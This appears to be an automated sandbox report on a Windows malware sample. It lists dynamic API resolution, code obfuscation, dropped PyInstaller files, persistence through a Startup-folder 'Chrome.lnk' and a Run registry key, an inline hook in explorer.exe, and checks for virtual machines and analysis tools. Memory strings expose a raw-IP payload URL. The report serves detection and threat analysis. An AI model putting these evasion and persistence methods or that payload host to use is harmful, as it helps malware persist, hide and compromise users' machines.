Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe

Code function: 0_2_00007FF6E1702A28 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,

PE file contains sections with non-standard names

Source: libcrypto-1_1.dll.8.dr

Static PE information: section name: .00cfg

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\explorer.exe	Code function: 2_2_07DBA595 push rcx; ret	2_2_07DBA5A8
Source: C:\Windows\explorer.exe	Code function: 2_2_07DBA572 push rcx; ret	2_2_07DBA5A8
Source: C:\Windows\explorer.exe	Code function: 2_2_09CC18C8 push rcx; retf	2_2_09CC18CA
Source: C:\Windows\explorer.exe	Code function: 2_2_09CC18E0 push rcx; retf	2_2_09CC18E2
Source: C:\Windows\explorer.exe	Code function: 2_2_09CC18F8 push rcx; retf	2_2_09CC18FA
Source: C:\Windows\explorer.exe	Code function: 2_2_09CCC395 push rcx; ret	2_2_09CCC3A8
Source: C:\Windows\explorer.exe	Code function: 2_2_09CCC372 push rcx; ret	2_2_09CCC3A8
Source: C:\Windows\explorer.exe	Code function: 2_2_0C383108 push rsp; retf 0003h	2_2_0C383111
Source: C:\Windows\explorer.exe	Code function: 2_2_0C36C267 push rax; iretd	2_2_0C36C268
Source: C:\Windows\explorer.exe	Code function: 2_2_0C383AA2 push rsp; retf 0003h	2_2_0C383BE9
Source: C:\Windows\explorer.exe	Code function: 2_2_0C3832DA push rax; iretd	2_2_0C3832F1
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC1CE67 push rax; iretd	2_2_0FC1CE68
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC35DE8 push rax; ret	2_2_0FC35DE9
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC35D08 push rax; ret	2_2_0FC35D09
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC34CA2 push rsp; retf 0003h	2_2_0FC34DE9
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC35B78 push rax; ret	2_2_0FC35B79
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC39688 pushfq ; ret	2_2_0FC396C2
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC3965A pushfq ; ret	2_2_0FC39662
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC3966A pushfq ; ret	2_2_0FC39672
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC344DA push rax; iretd	2_2_0FC344F1
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC34308 push rsp; retf 0003h	2_2_0FC34311
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE01300200 push rdi; ret	11_2_00007FFE01300206
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012FA096 push rdi; ret	11_2_00007FFE012FA0A2
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012FA5B5 push rdi; ret	11_2_00007FFE012FA5BB
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012FFAED push rdi; ret	11_2_00007FFE012FFAF4
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE1321CB1B push rbp; retf	11_2_00007FFE1321CB28

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\ucrtbase.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	File created: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\libcrypto-1_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\libffi-7.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\python38.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome.lnk

Stores files to the Windows start menu directory

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome.lnk

Changes the view of files in windows explorer (hidden files and folders)

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Services			Jump to behavior
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Services			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\svchost.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden

Found hidden mapped module (file has been removed from disk)

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\TH5EE3.TMP
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\TH8363.TMP
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\THA35F.TMP
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\THC2BE.TMP

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: KERNEL32.DLL function: CreateProcessInternalW new code: 0xE9 0x90 0x00 0x07 0x75 0x5B

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe

Contain functionality to detect virtual machines

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: vmware.exe vmware-vmx.exe vboxservice.exe vboxservice.exe vboxtray.exe	0_2_00007FF6E1703C9C
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: vmware.exe vmware-vmx.exe vboxservice.exe vboxservice.exe vboxtray.exe	3_2_00007FF699AB3C9C
Source: C:\Windows\System32\svchost.exe	Code function: vmware.exe vmware-vmx.exe vboxservice.exe vboxservice.exe vboxtray.exe	4_2_00007FF7536F3C9C
Source: C:\Windows\System32\svchost.exe	Code function: vmware.exe vmware-vmx.exe vboxservice.exe vboxservice.exe vboxtray.exe	7_2_00007FF736B53C9C
Source: C:\Windows\System32\svchost.exe	Code function: vmware.exe vmware-vmx.exe vboxservice.exe vboxservice.exe vboxtray.exe	13_2_00007FF7F4E73C9C

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: svchost.exe	Binary or memory string: PROCESSHACKER.EXE
Source: svchost.exe	Binary or memory string: X64DBG.EXE
Source: fNzx1wx8tL.exe, 00000000.00000003.1709851725.0000015FFE2BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ORER\STARTUPAPPROVED\STARTUPFOLDERPROCESSHACKER.EXEPROCEXP.EXEPROCEXP64.EXETOTALCMD.EXEX64DBG.EXEHTTP://176.111.174.140/API/L
Source: fNzx1wx8tL.exe	Binary or memory string: WCSCPYMSVCRT.DLLWCSCATWCSCMPWCSNCPYWCSLENSTRLENREALLOCFREEWCSSTRCLOSEHANDLEKERNEL32.DLLCREATEFILEWFREELIBRARYMOVEFILEWGETFILESIZEEXGETWINDOWSDIRECTORYAGETVOLUMEINFORMATIONAGETTICKCOUNTWSPRINTFWUSER32.DLLWSPRINTFAVIRTUALALLOCREADFILESLEEPVIRTUALFREESETFILEPOINTERCREATEDIRECTORYWFINDFIRSTFILEWFINDNEXTFILEWFINDCLOSECOPYFILEWWRITEFILEGETSYSTEMDIRECTORYWEXITPROCESSCREATEPROCESSWSHELLEXECUTEWSHELL32.DLLGETMODULEFILENAMEWGETSHORTPATHNAMEWGETENVIRONMENTVARIABLEWINTERNETOPENWWININET.DLLINTERNETOPENURLWHTTPQUERYINFOAINTERNETREADFILEINTERNETCONNECTWHTTPOPENREQUESTWHTTPSENDREQUESTAINTERNETCLOSEHANDLESHGETFOLDERPATHWSHGETFOLDERPATHASHGETKNOWNFOLDERPATHPATHISURLWSHLWAPI.DLLPATHCOMBINEWPATHFINDFILENAMEWREGDELETEKEYWADVAPI32.DLLREGOPENKEYEXAREGSETVALUEEXAREGCLOSEKEYOPENPROCESSTOKENGETTOKENINFORMATIONADJUSTTOKENPRIVILEGESGETUSERNAMEWLOOKUPPRIVILEGEVALUEACOUNINITIALIZEOLE32.DLLCOCREATEINSTANCECOINITIALIZEMESSAGEBOXAMOZILLA/5.0 (WINDOWS NT 10.0; WIN64; X64) APPLEWEBKIT/537.36 (KHTML, LIKE GECKO) CHROME/129.0.0.0 SAFARI/537.3SEDEBUGPRIVILEGEREFLECTIVELOADERSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\RUNSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\STARTUPFOLDERPROCESSHACKER.EXEPROCEXP.EXEPROCEXP64.EXETOTALCMD.EXEX64DBG.EXEHTTP://176.111.174.140/API/LOADER.BINVMWARE.EXEVMWARE-VMX.EXEVBOXSERVICE.EXEVBOXTRAY.EXESVCHOST.EXECHROMEBAD LOCALE NAMEIOS_BASE::BADBIT SETIOS_BASE::FAILBIT SETIOS_BASE::EOFBIT SET%SYSTEMROOT%\SYSTEM32\SVCHOST.EXE%08LX%04LX%LUZBI\.EXE.LNK\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCEDHIDDENSERVICESUNKNOWN.FIREFOX.EXEEXPLORER.EXE\MRT.EXE\MOZILLA\FIREFOX\PROFILES\*RELEASE

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\explorer.exe

Code function: 2_2_09CB21B0 CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,Thread32Next,CloseHandle,OpenThread,SuspendThread,GetThreadContext,SetThreadContext,CloseHandle,

Contains functionality to detect virtual machines (SLDT)

Source: C:\Windows\explorer.exe

Code function: 2_2_0FC35F19 sldt word ptr [rax]

2_2_0FC35F19

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 7977	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 3741	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 6088	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 653	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 649	Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\libcrypto-1_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
